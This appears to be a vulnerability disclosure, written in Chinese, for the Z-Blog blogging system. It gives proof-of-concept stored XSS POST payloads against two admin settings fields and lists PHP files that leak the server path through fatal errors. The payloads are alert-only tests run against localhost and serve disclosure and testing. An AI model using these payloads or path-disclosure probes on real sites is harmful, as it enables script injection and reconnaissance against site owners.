poc:

ZC_BLOG_SUBNAME参数的POC:

http://localhost/z-blog/zb_system/cmd.php?act=SettingSav&token=2c7ca9a4c1c3d856e012595ca878564f

post_data:

ZC_BLOG_HOST=http%3A%2F%2Flocalhost%2Fz-blog%2F&ZC_PERMANENT_DOMAIN_ENABLE=&ZC_PERMANENT_DOMAIN_WITH_ADMIN=&ZC_BLOG_NAME=admin&ZC_BLOG_SUBNAME=Good%20Luck%20To%20You!tluf3%22%3e%3cscript%3ealert(1)%3c%2fscript%3euk095&ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&ZC_TIME_ZONE_NAME=Asia%2FShanghai&ZC_BLOG_LANGUAGEPACK=zh-cn&ZC_UPLOAD_FILETYPE=jpg%7Cgif%7Cpng%7Cjpeg%7Cbmp%7Cpsd%7Cwmf%7Cico%7Crpm%7Cdeb%7Ctar%7Cgz%7Csit%7C7z%7Cbz2%7Czip%7Crar%7Cxml%7Cxsl%7Csvg%7Csvgz%7Crtf%7Cdoc%7Cdocx%7Cppt%7Cpptx%7Cxls%7Cxlsx%7Cwps%7Cchm%7Ctxt%7Cpdf%7Cmp3%7Cmp4%7Cavi%7Cmpg%7Crm%7Cra%7Crmvb%7Cmov%7Cwmv%7Cwma%7Cswf%7Cfla%7Ctorrent%7Capk%7Czba%7Cgzba&ZC_UPLOAD_FILESIZE=2&ZC_DEBUG_MODE=&ZC_GZIP_ENABLE=&ZC_SYNTAXHIGHLIGHTER_ENABLE=1&ZC_CLOSE_SITE=&ZC_DISPLAY_COUNT=10&ZC_DISPLAY_SUBCATEGORYS=1&ZC_PAGEBAR_COUNT=10&ZC_SEARCH_COUNT=20&ZC_MANAGE_COUNT=50&ZC_COMMENT_TURNOFF=&ZC_COMMENT_AUDIT=&ZC_COMMENT_REVERSE_ORDER=&ZC_COMMENTS_DISPLAY_COUNT=100&ZC_COMMENT_VERIFY_ENABLE=

ZC_UPLOAD_FILETYPE 参数的POC:

post_data:

ZC_BLOG_HOST=http://localhost/z-blog/&ZC_PERMANENT_DOMAIN_ENABLE=&ZC_PERMANENT_DOMAIN_WITH_ADMIN=&ZC_BLOG_NAME=admin&ZC_BLOG_SUBNAME=Good+Luck+To+You!&ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&ZC_TIME_ZONE_NAME=Asia/Shanghai&ZC_BLOG_LANGUAGEPACK=zh-cn&ZC_UPLOAD_FILETYPE=jpg|gif|png|jpeg|bmp|psd|wmf|ico|rpm|deb|tar|gz|sit|7z|bz2|zip|rar|xml|xsl|svg|svgz|rtf|doc|docx|ppt|pptx|xls|xlsx|wps|chm|txt|pdf|mp3|mp4|avi|mpg|rm|ra|rmvb|mov|wmv|wma|swf|fla|torrent|apk|zba|gzbauckek">alert(1)ekkgh&ZC_UPLOAD_FILESIZE=2&ZC_DEBUG_MODE=&ZC_GZIP_ENABLE=&ZC_SYNTAXHIGHLIGHTER_ENABLE=1&ZC_CLOSE_SITE=&ZC_DISPLAY_COUNT=10&ZC_DISPLAY_SUBCATEGORYS=1&ZC_PAGEBAR_COUNT=10&ZC_SEARCH_COUNT=20&ZC_MANAGE_COUNT=50&ZC_COMMENT_TURNOFF=&ZC_COMMENT_AUDIT=&ZC_COMMENT_REVERSE_ORDER=&ZC_COMMENTS_DISPLAY_COUNT=100&ZC_COMMENT_VERIFY_ENABLE=

从Github的归档界面中可以看到是最新版的洞。

http://localhost/z-blog//zb_system/admin/admin_footer.php
http://localhost/z-blog//zb_system/admin/admin_header.php
http://localhost/z-blog//zb_system/admin/admin_left.php
http://localhost/z-blog//zb_system/admin/admin_top.php
http://localhost/z-blog//zb_system/function/c_system_admin.php
http://localhost/z-blog//zb_system/function/c_system_misc.php
http://localhost/z-blog//zb_system/function/lib/category.php
http://localhost/z-blog//zb_system/function/lib/comment.php
http://localhost/z-blog//zb_system/function/lib/dbmysql.php
http://localhost/z-blog//zb_system/function/lib/dbmysqli.php
http://localhost/z-blog//zb_system/function/lib/dbpdo_mysql.php
http://localhost/z-blog//zb_system/function/lib/dbpdo_pgsql.php
http://localhost/z-blog//zb_system/function/lib/dbpdo_sqlite.php
http://localhost/z-blog//zb_system/function/lib/dbpgsql.php
http://localhost/z-blog//zb_system/function/lib/dbsqlite.php
http://localhost/z-blog//zb_system/function/lib/dbsqlite3.php
http://localhost/z-blog//zb_system/function/lib/member.php
http://localhost/z-blog//zb_system/function/lib/module.php
http://localhost/z-blog//zb_system/function/lib/networkcurl.php
http://localhost/z-blog//zb_system/function/lib/networkfile_get_contents.php
http://localhost/z-blog//zb_system/function/lib/networkfsockopen.php
http://localhost/z-blog//zb_system/function/lib/post.php
http://localhost/z-blog//zb_system/function/lib/sqlmysql.php
http://localhost/z-blog//zb_system/function/lib/sqlpgsql.php
http://localhost/z-blog//zb_system/function/lib/sqlsqlite.php
http://localhost/z-blog//zb_system/function/lib/tag.php
http://localhost/z-blog//zb_system/function/lib/upload.php
http://localhost/z-blog//zb_users/cache/compiled/default/comment.php
http://localhost/z-blog//zb_users/cache/compiled/default/comments.php
http://localhost/z-blog//zb_users/cache/compiled/default/index.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-archives.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-authors.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-catalog.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-comments.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-previous.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-statistics.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-tags.php
http://localhost/z-blog//zb_users/cache/compiled/default/post-multi.php
http://localhost/z-blog//zb_users/cache/compiled/default/post-page.php
http://localhost/z-blog//zb_users/cache/compiled/default/post-single.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar2.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar3.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar4.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar5.php
http://localhost/z-blog//zb_users/cache/compiled/default/single.php
http://localhost/z-blog//zb_users/plugin/AppCentre/include.php
http://localhost/z-blog//zb_users/plugin/AppCentre/networkcurl.php
http://localhost/z-blog//zb_users/plugin/AppCentre/networkfile_get_contents.php
http://localhost/z-blog//zb_users/plugin/AppCentre/networkfsockopen.php
http://localhost/z-blog//zb_users/plugin/STACentre/include.php
http://localhost/z-blog//zb_users/plugin/Totoro/include.php
http://localhost/z-blog//zb_users/plugin/UEditor/include.php
http://localhost/z-blog//zb_users/plugin/UEditor/php/action_crawler.php
http://localhost/z-blog//zb_users/plugin/UEditor/php/action_upload.php
http://localhost/z-blog//zb_users/theme/default/include.php
http://localhost/z-blog//zb_users/theme/metro/include.php
http://localhost/z-blog//zb_users/theme/WhitePage/include.php

访问提示：

Fatal error: Interface 'iDataBase' not found in C:\phpStudy\WWW\Z-Blog\zb_system\function\lib\dbsqlite3.php on line 8